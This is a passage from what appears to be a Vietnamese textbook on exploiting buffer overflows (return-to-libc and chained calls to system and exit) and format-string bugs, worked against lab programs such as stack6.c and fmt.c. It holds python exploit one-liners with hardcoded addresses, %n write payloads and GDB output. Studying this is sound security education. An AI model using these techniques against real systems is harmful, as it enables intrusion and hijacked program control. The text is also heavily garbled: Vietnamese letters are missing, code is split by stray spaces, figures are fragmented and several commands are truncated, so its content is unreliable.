BFFFFA30 : 01 00 00 00 A4 FA FF BF - AC FA FF BF 00 00 00 00 ................
BFFFFA20 : 00 00 00 00 C0 0C 00 B8 - 78 FA FF BF A8 2E EC B7 ........x.......
BFFFFA10 : 8C 8C EB B7 F4 AF FD B7 - 00 00 00 00 F4 AF FD B7 ................
BFFFFA00 : 01 00 00 00 A4 FA FF BF - 28 FA FF BF 29 85 04 08 ........(...)...
[0073:08048476]-----------------------------------------------------------[code]
0x8048479 <main+9>: lea eax,[ebp-4]
0x8048481 <main+17>: push 0x80485d0
0x804848b <main+27>: add esp,0x10
--------------------------------------------------------------------------------
Breakpoint 1, 0x08048476 in main ()
gdb$ print system
$1 = {<text variable, no debug info>} 0xb7ee3990 <system>
gdb$
Lnh break main t mt im dng ti hm main ca chng trnh. Lnh
run thc thi chng trnh. Khi chng trnh chy, hm main s c gi, v
im dng thit lp s chn chng trnh ngay u hm main. Ti thi im
ny, chng trnh c ti ln b nh hon ton cho nn b th vin chun
cng c ti. Cui cng chng ta dng lnh print system in a ch
hm system. a ch ca hm system l B7EE3990.
Chng ta c th gn a ch ny vo ngn xp cha a ch tr v ca hm
main khi main kt thc th n s nhy ti system trc tip. Vn cn li
l ta cn xc nh ngn xp no cha tham s ca system.
64 CHNG 3. TRN B M
...
34 FA FF BF
XX XX XX XX
90 39 EE B7
ebp c!
cookie
buf
buf
buf
2E 2F 61 00
...
BFFFFA34
Hnh 3.11: Trng thi ngn xp quay v hm system
c gi s thy s khc nhau gia vic quay tr v lnh gi hm, v quay
tr v hm mt cch trc tip chnh l mt ngn xp d. Khi quay v lnh
gi hm, tc v u tin ca lnh CALL s dch chuyn con tr ngn xp xung
mt ngn xp trc khi con tr lnh chuyn n a ch hm. Khi quay v
hm trc tip, con tr ngn xp vn gi nguyn v tr ca n, ch c con tr
lnh b thay i ch n a ch hm.
Trong c hai trng hp, khi con tr lnh ch n phn dn nhp ca
hm, con tr ngn xp s ch n ngn xp cha a ch tr v ca hm y.
Do , da vo m hnh cu trc ngn xp minh ha trong Hnh 2.11, tham
s u tin ca hm s l ngn xp ngay bn trn nh ngn xp. V nh
ngn xp hin ti chnh l ngn xp ngay bn trn a ch tr v ca main
nh kho st v d trc, trong Tiu mc 3.4.4.
Chng ta c y cc yu t tn dng li thng qua vic s dng
mt chng trnh ngoi. Chng ta s nhp chui ./a, theo sau bi mt k t
kt thc chui, ri C k t bt k lp y buf, 4 k t khc lp y cookie,
thm 4 k t na lp gi tr EBP c, ri 4 k t c m ASCII ln lt l 90,
39, EE, v B7 xc nh a ch ca hm system, 4 k t bt k lp a ch
tr v ca hm system, v 4 k t c m ASCII ln lt l 34, FA, FF, v BF
xc nh v tr bin buf. Hnh 3.11 miu t trng thi ngn xp cn t c.
V khi thc hin tn dng li, chng ta s nhn c kt qu tng t nh
hnh chp sau.
regular@exploitation:~/src$ python -c print "./a" + "\x00"*(1+0x0C+4+4) + "\x90
\x39\xEE\xB7" + "aaaa" + "\x34\xFA\xFF\xBF" | ./stack5
You win!
Segmentation fault
Chng ta thnh cng vi cch tn dng li mi. Phng php quay tr
v mt hm trc tip trong th vin chun (v d nh system) c gi l quay
v th vin chun (return to libc). Phng php ny c hai u im chnh:
S lng cc hm trong b th vin chun rt nhiu, do a s cc
chng trnh u s dng ti b th vin chun cho mc ch ny hay
mc ch kia, v v tnh kt ni ti c nhng hm khng cn thit v d
nh system.
Quay v th vin chun khng gp phi nhng ro cn v kh nng thc
thi ca m lnh nh i vi cc phng php quay v mt vng nh cha
d liu khc.
3.5.5.2 Vi trng hp tn chng trnh l abc
Phn ny n gin ch m rng nhng g chng ta bn phn trc. Vn
c t ra y l nu tn chng trnh ngoi l abc thay v a, th chng
ta cn thay i nhng g t c cng kt qu?
Qu n gin, chng ta ch cn thay ./a thnh ./abc v gim bt 2 byte
m trong cu lnh tn dng nh sau.
regular@exploitation:~/src$ mv a abc
regular@exploitation:~/src$ python -c print "./abc" + "\x00"*(1+0x0C+4+4-2) + "
\x90
sh: ./ab: No such file or directory
Segmentation fault
Chng ta khng nhn c dng ch mong mun! Thay vo , chng ta
nhn c mt thng bo li khng tm c tp tin ./ab. iu ng ch
l ./ab c v nh xut pht t ./abc. kim chng, chng ta s thay ./abc
thnh ./defg v hy vng thng bo li s tr thnh khng tm thy tp tin
./de.
regular@exploitation:~/src$ python -c print "./defg" + "\x00"*(1+0x0C+4+4-3) +
"\x90
sh: ./de: No such file or directory
Segmentation fault
Qu tht, c v nh chng trnh ch nhn hai k t u ca tn tp tin
truyn vo. Do , phng php n gin nht p chng trnh thc thi tp
tin abc trong khi ta ch c th s dng hai k t l to mt lin kt mm (soft
66 CHNG 3. TRN B M
link) n tp tin abc. Hnh chp sau to lin kt mm tn de, ch ti tp tin
abc, v thc hin tn dng li y ht nh trn.
regular@exploitation:~/src$ ln -s abc de
regular@exploitation:~/src$ python -c print "./defg" + "\x00"*(1+0x0C+4+4-3) +
"\x90
You win!
Segmentation fault
Tuy t c mc ch nhng chng ta vn cha gii thch c l do
ti sao hm system ch nhn hai k t u tin.
'
&
$
%
Dng c v suy ngh
Bn c c th th b chui ./ u tit kim thm 2 k t na. Nh
thit lp bin mi trng PATH ch ti th mc cha tp tin y, v cn thn
vi s thay i ca a ch bin buf.
Dng c v suy ngh

Hy th suy ngh v l do ca s ct khc.
Khi con tr lnh chuyn n phn dn nhp ca system th con tr ngn
xp ang ch ti ngn xp ngay trn a ch tr v ca hm main. Phn dn
nhp ca system s khi to mt vng nh ngn xp cho hm system bng cch
gim gi tr ca ESP, lm cho ESP ch n mt ngn xp no bn di
nh c bn n trong Tiu mc 2.3.1. Cc bin ni b ca system s c
lu trong vng nh ngn xp ny v chng chng ln phn d liu ca bin buf.
Trong trng hp ny, c l hm system s dng 24 (thp phn) byte nn
vn cn 4 byte u ca buf cha b mt hn, dn n s ct khc nh chng
ta thy. Hnh 3.12 minh ha s chng lp vng nh ngn xp ca hm system
ln vng nh ngn xp c ca hm main khi c th thc thi ./abc. Bn tri
l trng thi b nh khi va thc hin lnh RET phn kt thc ca main, v
bn phi m t cc ngn xp c s dng trong hm system.
trnh d liu ca chng ta b chng lp th chng ta phi t n v tr
khc. Chng ta c th t chui ./abc vo sau bin buf thay v trc nh
trong hnh chp bn di.
34 FA FF BF
61 61 61 61
90 39 EE B7
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
63 00 00 00
2E 2F 61 62
34 FA FF BF
61 61 61 61
system
system
system
system
system
system
2E 2F 61 62
ESP
&buf=
BFFFFA34
&cookie
ch!a "#a
ch$ tr% v&
c'a main
Hnh 3.12: Vng nh ngn xp hm system chng ln bin buf
regular@exploitation:~/src$ python -c print "\x00"*(0x10+4+4) + "\x90\x39\xEE\x
B7" + "aaaa" + "\x58\xFA\xFF\xBF./abc\x00" | ./stack5
You win!
Segmentation fault
V chng ta chuyn chui ra pha sau nn a ch chui s l BFFFFA34 +
24 = BFFFFA58, tc l a ch ca bin buf cng thm khong cch t bin
buf ti chui ./abc. V bn thn bin buf s c lp y bng k t bt k.
Xem Hnh 3.13.
Hoc ta cng c th s dng bin mi trng nh sau.
regular@exploitation:~/src$ export EGG=./abc
bffffc39
B7" + "aaaa" + "\x39\xFC\xFF\xBF" | ./stack5
You win!
Segmentation fault
Bn c cn ch rng v di ca getenv v stack5 l nh nhau (cng
6 k t) nn a ch do getenv cung cp c th c s dng ngay vi stack5
m khng cn iu chnh. Cch s dng bin mi trng c v tin li hn so
68 CHNG 3. TRN B M
...
63 00 XX XX
2E 2F 61 62
58 FA FF BF
61 61 61 61
90 39 EE B7
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
...
BFFFFA34
&cookie
BFFFFA58
Hnh 3.13: t ./abc vo cui chui
vi nhng g chng ta lm.
3.6 Quay v th vin chun nhiu ln
C mt im khng hay nhng cu lnh tn dng m chng ta xem qua.
Tuy chng ta vn in c chui cn in nhng ng thi chng ta cng lm
chng trnh gp li phn on (segmentation fault). nhng chng trnh
c thit k tt, vic gp phi mt li tng t nh th ny s khin cho ngi
qun tr c cnh bo v dn n vic tn dng li gp nhiu kh khn hn.
Chng ta hy xem xt mt chng trnh nh th trong Ngun 3.11.
Tht ra chng trnh ny ch thm vo mt phn x l tn hiu (signal han-
dler) SIGSEGV in ra mn hnh dng ch You still lose!. Tn hiu SIGSEGV
c h iu hnh gi ti chng trnh khi chng trnh mc phi li phn on.
Trc ht, chng ta cn phi tm hiu ti sao cc cu lnh tn dng li ca
chng ta li lm cho chng trnh mc phi li phn on. Nh li rng chng
ta s dng cch quay v th vin chun p hm main khi thot s nhy
ti hm system. Hm system cng nh nhiu hm khc, khi thc hin xong tc
v cng s phi tr v hm gi n. Trong Hnh 3.13, a ch tr v ca system
l 61616161. a ch ny thng thng khng c nh x vo b nh nn khi
con tr lnh quay v a ch , chng trnh khng th c lnh t b nh,
gy ra li phn on.
khc phc li, chng ta phi p hm system quay v mt lnh, hoc mt
hm no chm dt chng trnh, khng tip tc quay v hm gi n. Mt
3.6. QUAY V TH VIN CHUN NHIU LN 69
2 #include <s i g na l . h>
3
4 void segv_handl er ( i nt s i g na l )
5 {
6 pr i nt f ( "You s t i l l l o s e ! \ n" ) ;
7 abort ( 1);
8 }
9
10 void i n i t ( )
11 {
12 s i g na l (SIGSEGV, segv_handl er ) ;
13 }
14
15 i nt main ( )
16 {
17 i nt cooki e ;
18 char buf [ 1 6 ] ;
19 i n i t ( ) ;
21 ge t s ( buf ) ;
22 i f ( cooki e == 0x000D0A00)
23 {
24 pr i nt f ( "You l o s e ! \ n" ) ;
25 }
26 }
Ngun 3.11: stack6.c
trong nhng hm khng quay v l hm exit. Hm exit chm dt hot ng
ca mt chng trnh vi m kt thc l tham s c truyn vo. V chng
ta khng quan tm ti m kt thc ca chng trnh nn chng ta cng khng
cn quan tm n tham s ca hm.
Cui cng, khng cn vng li phn on th chng ta ch cn cho system
quay v exit nh Hnh 3.14. Cng vic cn lm s bao gm tm a ch exit v
thay a ch ny vo v tr ca 4 k t a trong cu lnh tn dng li ca chng
ta. a ch ca hm exit (l mt hm trong b th vin chun) c th c tm
thng qua GDB tng t nh khi chng ta tm a ch ca system. a ch ny
l B7ED92E0. Nh vy, cu lnh tn dng li ca chng ta s tng t nh
hnh chp bn di.
B7" + "\xE0\x92\xED\xB7" + "\x39\xFC\xFF\xBF" | ./stack6
You win!
K thut m chng ta va xem xt qua c gi l quay v th vin chun
nhiu ln (chained return to libc). K thut ny l s pht trin ca quay v
70 CHNG 3. TRN B M
th vin chun nhm thc hin nhiu hn mt tc v trong mt ln tn dng.
Trong v d xt phn ny, chng ta quay v th vin chun hai ln thc
hin mt lnh v thot khi chng trnh. Tuy nhin, nu sp xp cc gi tr
v th t gi hm chun xc th chng ta c th quay v th vin chun nhiu
ln hn na.
regular@exploitation:~/src$ python -c print "\x00"*(0x10+4+4) + "\x70\x23\xEF\x
B7" + "\xF0\x22\xEF\xB7" + "\x54\xFA\xFF\xBF" + "\x5C\xFA\xFF\xBF" + "\xE0\x92\x
ED\xB7" + "\x5C\xFA\xFF\xBF" + "You win!" | ./stack6
You win!regular@exploitation:~/src$
Dng lnh tn dng trn kt ni main sprintf printf exit ch mang tnh
gii thiu v khng c gi tr thc tin v bn c c th d dng s dng hai
lnh printf v exit l , khng cn sprintf trc. Gii thch cn k cu lnh
trn c dnh lm mt cu nh cho bn c.
3.7 Tm tt v ghi nh
Li trn b m l mt trong cc li nguy him nht v vn ph bin n
ngy nay. Bn cht li trn b m n gin l d liu nhp vt qu
vng nh c cp cha n. S nguy him xy ra khi cc d liu quan
trng i vi chng trnh nm pha sau vng nh b trn v d liu
trn c th lm thay i cc d liu quan trng y.
tn dng mt chng trnh, trc ht ngi tn dng li phi hiu r
cch thc hot ng ca bn thn chng trnh, ca cc th vin chng
s dng, v cc hm c gi. S hiu bit ny gip cho ngi tn dng
li nhanh chng khc phc hoc vt qua nhng cn tr trong bn thn
chng trnh. S hiu bit v nhiu mt cng gip ngi tn dng li tm
ra phng php khc thay v c gng lm theo phng php c b
chn.
Qu trnh tn dng li i hi ngi tn dng tr li hai cu hi quan
trng: cn a d liu g, v lm sao a d liu vo chng trnh.
Hai cu hi ny ch c th c tr li khi ngi tn dng hiu r cch
hot ng ca chng trnh.
Nu chng trnh c t b nhp chun, chng ta c th s dng ng,
hoc chuyn hng thay i dng nhp vo chng trnh.
Ngn ng kch bn gip ngi tn dng li tit kim rt nhiu thi gian.
Python l mt trong nhng ngn ng c s dng ph bin.
Cc d liu quan trng nh hng n qu trnh hot ng ca chng
trnh c th l mt bin, mt c quan trng, a ch tr v ca mt hm
trong ngn xp.
Cc cng c nh objdump, GDB c th cho chng ta bit nhiu thng tin
v chng trnh v d nh cc lnh hp ng, a ch cc lnh ny, thm
ch l cc m my tng ng.
GDB l mt chng trnh g ri cho php chng ta kho st qu trnh
thc thi ca mt chng trnh mt cch tng tc. Chng ta c th dng
GDB tm a ch cc hm trong b th vin chun.
C nhiu cch np d liu vo vng nh ca mt chng trnh nh
thng qua vic nhp d liu thng thng, hoc cc bin mi trng,
hoc cc tham s dng lnh, hay ngay c tn chng trnh.
a ch cc bin mi trng rt nhy cm vi cc thay i v s lng, ni
dung, v tn ca cc bin mi trng. Chng ta phi m bo hai chng
trnh c cng mt mi trng thc thi th a ch cc bin mi trng mi
nh nhau. Mi k t tng thm tn chng trnh lm gim hai n v
a ch bin mi trng.
Quay v bn thn chng trnh l k thut thay i lung thc thi ca
chng trnh thng qua vic thay i a ch tr v ca mt hm con
tr lnh ch n phn on .text ca chng trnh. Vic xc nh vai tr
cc ngn xp l mu cht thnh cng cc k thut thay i lung thc
thi. V tr t d liu cng cn c lu trnh b chn lp bi vng
nh ngn xp ca cc hm khc.
Quay v th vin chun l k thut tng t nh quay v .text nhng
con tr lnh s ch ti cc hm trong b th vin chun thay v ch ti
cc lnh ca chng trnh. Chng ta c th lin kt nhiu ln quay v th
vin chun vi nhau thc hin nhiu tc v trong mt ln tn dng.
Th vin chun c s dng trong hu ht mi chng trnh. iu ny
em li cho chng ta mt kho cng c ln khi s dng phng php quay
v th vin chun bi v mi hm trong th vin u c th c tn dng
mc d bn thn chng trnh khng tham chiu ti cc hm .
i khi vic tn dng li ch n gin l to lin kt mm hoc i tn
tp tin. i khi n i hi s nghin cu t m, tnh ton chi tit v sng
to trong vic bin chuyn cc k thut c bn. Vic tn dng li cng l
mt qu trnh th-sai-th-li tm ra nhiu cch thc mi v so snh s
thay i trong hot ng ca chng trnh.
72 CHNG 3. TRN B M
main system exit
d!n
nh"p
printf
gets
cookie=
000D0A00
printf
b!ng
k#t
thc
khng
d!n
nh"p
thn
k#t
thc
d!n
nh"p
thn
k#t
thc
Hnh 3.14: Kt ni hai ln quay v system v exit
Chng 4
Chui nh dng
Ph bin, nguy him tng t v d b tn dng hn li trn b m l cc li
lin quan n chui nh dng.
4.1 Khi nim
Chng ta s dng printf trong cc v d nhng phn trc nh sau:
printf(You win!);
Chui You win! l tham s u tin ca printf, v tham s ny c mt vai
tr c bit i vi printf : n xc nh kiu hin th ca nhng tham s sau.
Chnh v vy, tham s u tin ca printf c gi l chui nh dng (format
string). Chui nh dng cn c s dng trong cc hm cng h vi printf
nh sprintf, fprintf, vsprintf, v.v. . .
Chng ta hy th thc thi mt vi chng trnh nh sau.
1 i nt main ( )
2 {
3 pr i nt f ( "One per cent i s wr i t t en as 1%\n" ) ;
4 }
1 i nt main ( )
2 {
3 pr i nt f ( "Onethousandth i s wr i t t en as 1%%\n" ) ;
4 }
on m u tin in ra One percent is written as 1%, v on m th
hai in One thousandth is written as 1%. Bn c s ch thy thiu mt
du phn trm trong kt qu th hai. iu ny chng t printf khng n gin
in tham s th nht nh c truyn vo, m c nhng x l nht nh i
vi tham s ny.
Ti liu hm printf cho bit k t du phn trm (%) c ngha c bit
trong chui nh dng. N nh du s bt u ca mt yu cu nh dng
(conversion specification). Yu cu nh dng c kt thc bi mt k t nh
dng (conversion specifier). Mt s cc k t nh dng c th c bao gm %, c,
x, X, s, n, hn.
73
74 CHNG 4. CHUI NH DNG
% in ra chnh k t phn trm. y l l do v sao on m th hai ch in mt
k t phn trm.
c in tham s nh mt k t.
x in tham s nh mt s thp lc phn, s dng cc k t thng.
X tng t nh x nhng s dng cc k t hoa.
s in chui ti v tr ch ti bi tham s.
n vit vo v tr c ch ti bi tham s s lng k t (l mt s nguyn 4
byte) c in ra mn hnh.
hn tng t nh n nhng ch vit 2 byte thp thay v ton b 4 byte.
Cc k t nh dng ny c th nhn thm tham s, tham s u tin c v tr
1. Nu khng c ch r
1
, th tham s c s dng s l tham s k. V d
bn di c hai yu cu nh dng l %c v %X. Tham s u tin l 0x87654321,
v tham s cho yu cu nh dng th hai l 0x12345678. Khi thc thi, chng
ta s nhn c dng ch ! 12345678.
1 i nt main ( )
2 {
3 pr i nt f ( "%c%X\n" , 0x87654321 , 0x12345678 ) ;
4 }
Gia k t phn trm v k t nh dng cn c nhng t chn khc m
chng ta s xem xt dc theo nhng bi tp ca phn ny.
4.2 Qut ngn xp
Chng ta s xem xt v d Ngun 4.1. Mc ch ca chng trnh l nhn d
liu nhp ca ngi dng v xut chui c nhp ra mn hnh. Tuy nhin,
sau khi nhn d liu, chng trnh truyn thng chui ny lm tham s th
nht ca printf, thay v truyn nh cc tham s cho chui nh dng.
Khi nhp vo abcdef, chng trnh s in ra chnh chui abcdef.
regular@exploitation:~/src$ ./fmt
&cookie: 0xbffff854
abcdef
cookie = 00000000
abcdef
cookie = 00000000
Tuy nhin, khi nhp vo %x, chng trnh in ra kt qu kh l lm.
1
chng ta s ni v vic xc nh tham s trong Tiu mc 4.4.4
4.2. QUT NGN XP 75
2
4 {
5 char buf f e r [ 5 1 2 ] ;
6 i nt cooki e = 0;
7 pr i nt f ( "&cooki e : %p\n" , &cooki e ) ;
8 ge t s ( buf f e r ) ;
9 pr i nt f ( " cooki e =%.8X\n" , cooki e ) ;
10 pr i nt f ( buf f e r ) ;
11 pr i nt f ( "\ ncooki e =%.8X\n" , cooki e ) ;
12 return 0;
13 }
Ngun 4.1: fmt.c
&cookie: 0xbffff854
%x
cookie = 00000000
0
cookie = 00000000
Chng trnh in ra 0. Th li vi chui %x %x %x %x cho ta kt qu nh
bn di.
&cookie: 0xbffff854
%x %x %x %x
cookie = 00000000
0 0 0 6
cookie = 00000000
Chui nhn c l 0 0 0 6.
Dng c v suy ngh

V sao chng ta nhn c chui s ?
Chng ta nhp vo %x %x %x %x. iu ny s lm chng trnh thc hin
lnh gi
printf(%x %x %x %x);
Lnh printf ny c bn yu cu nh dng %x nn n cn s dng bn tham s
nhng khng c tham s no c truyn vo. Nh vy printf s ly gi tr
no in ra mn hnh?
Hy xem xt trng hp mt lnh printf tng t nhng vi y tham
s s c trnh bin dch chuyn sang hp ng nh th no.
printf(%x %x %x %x, 1, 2, 3, 4);
S c chuyn thnh cc dng tng t nh sau:
PUSH 4
PUSH 3
PUSH 2
PUSH 1
PUSH buffer
CALL printf
So vi lnh thiu tham s:
PUSH buffer
CALL printf
S khc bit l bn ngn xp cha gi tr xc nh trong trng hp u, v
s thiu ht bn ngn xp ny trng hp sau. Tuy nhin, hm printf ch
c th bit c 4 yu cu nh dng khi thc thi, tc khi trong thn
hm. Do , printf khng th bit trc khi c gi c 4 lnh PUSH thit
lp ngn xp hay cha. Cho nn khi gp cc yu cu nh dng c nhn tham
s, printf ch n gin thc hin tc v ly d liu v tr tng ng trn ngn
xp v x l chng theo yu cu. Hnh Hnh 4.1 minh ha cc ngn xp phi
c khi chui in ra l 0 0 0 6.
Chng ta khng bit ti sao gi tr ca cc ngn xp l 0, 0, 0, v 6, nhng
chng ta bit cc ngn xp phi c gi tr nh vy. y l mt tnh nng
m li chui nh dng em li cho ngi tn dng. Vi yu cu nh dng %x,
chng ta c th xc nh c gi tr cc nh ngn xp.
4.3 Gp li d liu nhp
Nu chng ta tip tc qut ngn xp vi cc yu cu nh dng %x, chng ta s
gp trng hp sau:
&cookie: 0xbffff854
%x %x %x %x %x %x %x %x %x %x %x %x
cookie = 00000000
0 0 0 6 b7ead8e0 fffff 51 0 0 25207825 78252078 20782520
cookie = 00000000
Chui 25207825 78252078 20782520 c v c bit. Khi c biu din
thnh cc ngn xp nh trong Hnh 4.2, chng ta c th nhn ra ngay gi tr
25207825 chnh l bn k t %x %, bn k t bt u chui nhp. Khng ch
vy, bt u t tham s 10, d liu m chng ta nhn c li chnh l chui
m chng ta nhp vo.
4.4. THAY I BIN COOKIE 77
...
06 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
!"a ch# chu$i !"nh d%ng
!"a ch# tr& v' c(a printf
ebp c)
bi*n n+i b+
c(a printf
...
tham s, 1
tham s, 2
tham s, 3
tham s, 4
Hnh 4.1: Tham s ca yu cu nh dng
Dng c v suy ngh

c gi c th gii thch ti sao khng?
Chng ta bit rng kh nng qut ngn xp l mt trong nhng im chng
ta c th li dng trong li trn b m. Nh li rng bin buffer ca chng
ta cng c t trong ngn xp. V nh m t trong Hnh 2.12, vng nh
ca printf nm di vng nh ca main. Do , khi ta qut ngn xp t di
ln, n mt lc no chng ta s gp li bin buffer. Trong v d ny, buffer
bt u t tham s 10. Chng ta s cn nh v tr ny v n cho php chng
ta truyn tham s vo cc yu cu nh dng. V d truyn s 41414141 th
chng ta s nhp bn k t A u chui, v m bo rng yu cu nh dng
%x s dng tham s th 10.
4.4 Thay i bin cookie
Yu cu nh dng %n ghi vo vng nh c ch ti bi tham s ca n s
lng k t c in ra mn hnh nn ghi mt d liu bt k vo mt vng
...
20 25 78 20
78 20 25 78
25 78 20 25
00 00 00 00
00 00 00 00
51 00 00 00
FF FF 0F 00
E0 D8 EA B7
06 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
...
tham s! 1
tham s! 10
"%x %"
Hnh 4.2: Gp li d liu nhp
nh ta s cn hai yu t:
Truyn a ch ca vng nh lm tham s cho %n.
Kim sot s lng k t c in ra mn hnh trc khi thc hin %n.
V chng ta c th truyn tham s cho %n nn yu t th nht tr thnh xc
nh a ch ca vng nh. V d nh thay i gi tr ca bin cookie, chng
ta phi bit a ch ca bin cookie. Chng ta s xem xt mt vi phng php
kim sot yu t th hai.
4.4.1 Mang gi tr 0x64
Mc tiu ca chng ta l lm cho gi tr cookie tr thnh 64 sau khi thc hin
lnh printf. n gin ha vic xc nh a ch bin cookie, Ngun 4.1 in
a ch ra mn hnh. a ch l BFFFF854.
Nh vy, chng ta s cn t bn k t c m ASCII ln lt 54, F8, FF,
v BF u chui, chn thm chn yu cu nh dng c s dng tham s, mt
s lng k t m bo tng s k t in l 100 (thp phn), v yu cu
nh dng th mi s l %n.
Trong nhng th nghim trc, chng ta x dng hng lot yu cu nh
dng %x cho nn gi tr (v do di) ca tng cc k t c in ra bi chn
%x chng ta c th xc nh c (1 + 1 + 1 + 1 + 8 + 5 + 2 + 1 + 1 = 15). Nh
vy, chui m (ngoi 4 k t u chui xc nh a ch bin cookie, v 15 k
t ca chn %x) s di 64 15 4 = 4B hay 75 (thp phn) k t.
regular@exploitation:~/src$ python -c print "\x54\xF8\xFF\xBF%x%x%x%x%x%x%x%x%x
" + "a"*75 + "%n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#####06b7ead8e0fffff5100aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
cookie = 00000064
cookie mang gi tr 100, vic duy nht chng ta cn lm l thm vo phn
m mt lng k t 100 64 = 9C.
" + "a"*(0x4B+0x9C) + "%n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa
cookie = 00000100
cookie mang gi tr 300, vic duy nht chng ta cn lm l thm vo phn
m mt lng k t 300 64 = 29C.
" + "a"*(0x4B+0x29C) + "%n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
cookie = 00000300
Segmentation fault
Mc d t c gi tr nh mong mun, nhng ta cng vng phi li phn
on.
Dng c v suy ngh

Ti sao chng ta li mc phi li phn on?
Chng ta dng 4 k t u, 9 cp k t %x k, 2E7 k t m v 2 k t %n
nhp vo chng trnh. Tng cng chng ta s dng 4+92+2E7+2 = 2FF
k t. S k t ny c chp thng vo bin buffer. V bin buffer ch c
cp 512 thp phn (200 thp lc phn) k t nn chng ta lm trn bin
buffer, khin hm main tr v mt a ch khng c nh x, dn n li phn
on.
trnh li phn on, chng ta phi nhp vo t hn, nhng vn m bo
printf in ra cng s lng k t.
Mt trong nhng ty chn gia k t phn trm v k t nh dng l
di ti thiu ca d liu c printf in ra. Ty chn ny l mt chui cc
ch s thp phn bt u bng mt s khc 0. V d, in mt s nguyn theo
dng thp lc phn vi di 12 th ta s dng lnh
printf(%18X, 0x12345678);
Lnh ny s in ra mn hnh chui 12345678. Tuy nhin, vi lnh
printf(%2X, 0x12345678);
chng ta s nhn c 12345678. Do , di ny ch l di ti thiu. Nu
d liu cn in ra di hn di c ch nh th ton b d liu vn c in
ra m khng b ct i. m bo chng ta kim sot c di chui in ra,
tt nht chng ta c gi s d liu s c di ti a. V d nu s dng %x th
di ti a l 8, nn chng ta phi xc nh di chui in ra ti thiu l 8.
Gi y, vit 300 vo cookie, ta s dng 4 byte u xc nh a ch
cookie, k ti 8 yu cu nh dng %8x, yu cu th 9 s c xc nh di
l 300 4 8 8 = 2BC (700 thp phn), hay %700x, v yu cu %n cui.
Chng ta ch s dng tng cng 4 + 8 3 + 5 + 2 = 23 k t t c mc
ch, thay cho 2FF k t nh trn.
regular@exploitation:~/src$ python -c print "\x54\xF8\xFF\xBF" + "%8x" * 8 + "%
700x" + "%n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T##### 0 0 0 6b7ead8e0 fffff 51 0
0
cookie = 00000300
4.4.4 Mang gi tr 0x300, ch s dng mt %x v mt %n
Nu kim sot c s lng k t c in ra mn hnh th tht ra chng
ta cng ch cn mt yu cu nh dng %x l . Vng mc duy nht l chng
ta phi m bo %n vn s dng tham s th 10, thay v tham s theo sau %x
(tc tham s th 2).
May mn thay mt trong cc ty chn ca yu cu nh dng l v tr tham
s. V tr tham s l mt chui s nguyn dng tn cng bi du ng ($).
Ty chn ny phi i theo ngay sau du phn trm bt u yu cu nh dng.
V d khi nhp AAAA%10$x th chng ta s nhn c chui AAAA41414141.
&cookie: 0xbffff854
AAAA%10$x
cookie = 00000000
AAAA41414141
cookie = 00000000
Vic gn 300 vo cookie by gi c th c n gin ha nh trong hnh
chp. Chng ta s vn cn 4 byte xc nh v tr bin cookie, sau ta dng
di 300 4 = 2FC hay 764 cho yu cu x, v kt thc vi yu cu n s dng
tham s th 10.
regular@exploitation:~/src$ python -c print "\x54\xF8\xFF\xBF" + "%764x" + "%10
$n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#####
0
cookie = 00000300
4.4.5 Mang gi tr 0x87654321
cookie mang gi tr 87654321, chng ta ch cn sa di ca nh dng x
thnh 87654321 4 = 8765431D hay 2271560477 thp phn.
regular@exploitation:~/src$ python -c print "\x54\xF8\xFF\xBF" + "%2271560477x"
+ "%10$n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#####
cookie = 00000005
Mun t 21 43 65 87
c 10 21 43 65
Cn thm 11 22 22 22
Bng 4.1: Tnh s lng k t m
C v nh printf khng hot ng theo chng ta mun. L do rt c th
v di qu ln nn b b qua.
Ngay c trong trng hp di ny c chp nhn, chng ta cng s phi
ch i mt khong thi gian kh lu printf in ht tt c trn hai t k t!
Do chng ta s cn ngh ra mt cch khc.
Dng c v suy ngh

Chng ta c th dng cch g y?
cookie c gi tr 87654321, bn byte bt u t v tr BFFFF854 phi
c gi tr ln lt l 21, 43, 65, 87. Do thay v ghi mt ln mt gi tr ln,
chng ta c th chia ra lm bn ln ghi vi bn gi tr nh.
Vi mi ln ghi, chng ta s cn ba thng tin:
a ch ghi vo
V tr tham s truyn vo yu cu nh dng
Gi tr mun ghi
Vi bn ln ghi, chng ta s cn bn a ch ghi vo. V chng ta ghi tng
byte t thp ti cao nn a ch ca bn ln ghi ny s ln lt l BFFFF854,
BFFFF855, BFFFF856, v BFFFF857.
Bn a ch ny c th c t u chui theo th t nn cc tham
s truyn vo yu cu nh dng s ln lt l 10, 11, 12, 13.
Gi tr mun ghi ca mi ln ghi s l 21, 43, 65, v 87. in 21 k t ra
mn hnh, ngoi tr 16 k t xc nh 4 a ch nu, chng ta s cn in thm
11 k t na. in 43 k t ra mn hnh, ngoi 21 k t va c in, chng
ta cn cn thm 22 k t na v.v. . . Vic tnh ton s lng k t m trc
mi ln ghi c tm tt trong Bng 4.1.
Dng lnh tn dng ca chng ta s tng t nh trong hnh chp sau.
regular@exploitation:~/src$ python -c print "\x54\xF8\xFF\xBF\x55\xF8\xFF\xBF\x
56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x11) + "x%10$n" + "%" + str(0x22) +
"x%11$n" + "%" + str(0x22) + "x%12$n" + "%" + str(0x22) + "x%13$n" | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#######V####### 0 0
0 6
cookie = 87654321
4.4.6 Mang gi tr 0x12345678
cookie mang gi tr 12345678 th bn byte bt u t v tr ca cookie s
phi ln lt mang gi tr 78, 56, 34, 12. p dng cch tnh s lng k t m
nh trn khin chng ta vng phi gi tr m (v d nh 56 78).
Dng c v suy ngh

